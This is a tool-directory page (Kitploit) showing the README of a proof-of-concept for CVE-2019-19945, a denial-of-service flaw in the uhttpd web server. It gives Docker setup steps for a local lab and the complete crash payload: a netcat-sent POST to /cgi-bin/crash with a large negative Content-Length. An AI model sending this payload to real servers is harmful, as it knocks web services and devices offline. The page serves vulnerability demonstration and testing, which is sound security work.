Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-19945_Test — Proof-of-concept exploit for CVE-2019-19945, demonstrating a denial-of-service attack against uhttpd via a crafted POST request with a negative Content-Length header. | Kitploit
Tools/GitHubGitHub/delicatebyte/cve-2019-19945_test
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubdelicatebyte/cve-2019-19945_test

CVE-2019-19945_Test

Proof-of-concept exploit for CVE-2019-19945, demonstrating a denial-of-service attack against uhttpd via a crafted POST request with a negative Content-Length header.

View Repository
14 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-19945_Test

This is the code for the first Proposed CVE

  1. Install Docker

  2. Build & RUN Server cd Server docker build -t server/cve . docker run -d --name server -p 80:80 server/cve

  3. Get Server Container IP Linux sudo docker container inspect server | grep -i IPAddress Windows Powershell docker container inspect server | Select-String "IPAddress" Extract IP and add it to Command for building the Client You can check the server by going to localhost:80 in your browser

  4. Build & Run Client by uncommenting the CMD in the Client/Dockerfile the attack will automatically start with the start of the container cd ../Client/ docker build --build-arg server_ip=<SERVER_IP> -t client/cve . docker run -d -p 8080:8080 client/cve

  5. Attach to CLient Docker docker container ls find client/cve container && attach docker exec -it /bin/sh

  6. When Ready Launch Attack ./crash.sh

  7. Server will be unable to respond

Commented Source Code

There really is no use in providing commented Sourcecode as the Exploit is very short

The Exploit then consits of using Netcat and sending a Post request with a negative large Content-Length to the Server Concering the handling of files in the cgi-bin/ directory

The Execution is conducted using a simple netcat script. Here Referencing a file in the CGI-bin Folder of the Server called Crash nc <SERVER_IP> < crash.poc

crash.poc

POST /cgi-bin/crash HTTP/1.0 Transfer-Encoding: chunked Content-Length: -100000

The largest issue was trying to get the old versions of uhttpd to run in a up to date docker environment.

Download Tool